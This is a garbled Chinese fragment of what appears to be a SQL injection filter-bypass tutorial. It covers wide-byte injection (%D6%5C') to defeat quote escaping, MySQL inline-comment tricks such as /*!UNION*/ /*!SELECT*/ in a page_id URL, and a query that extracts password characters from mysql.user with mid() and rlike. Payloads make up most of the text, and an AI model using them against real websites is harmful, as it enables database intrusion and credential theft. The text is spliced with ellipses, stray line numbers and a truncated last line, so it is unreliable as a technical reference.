前者利用双字节绕过,比如对单引号转义操作变成\',那么就变成了%D6%5C',%D6%5C构成了一个款字节即Unicode字节,单引号可以正常使用
第二个示例使用的是两种不同编码的字符的比较,它们比较的结果可能是...;#、--+用于终结语句的查询
2.内联注释
相比普通注释,内联注释用的更多,它有一个特性/!...**/只有MySQL能识别
举例:
index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3?page_id=null%0A/**//*!...=, %, /, *, &, &&, |, ||, , >>, LIKE, SOUNDS LIKE, RLIKE, REGEXP, LEAST, GREATEST...,1,1) like '*'
191select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
192select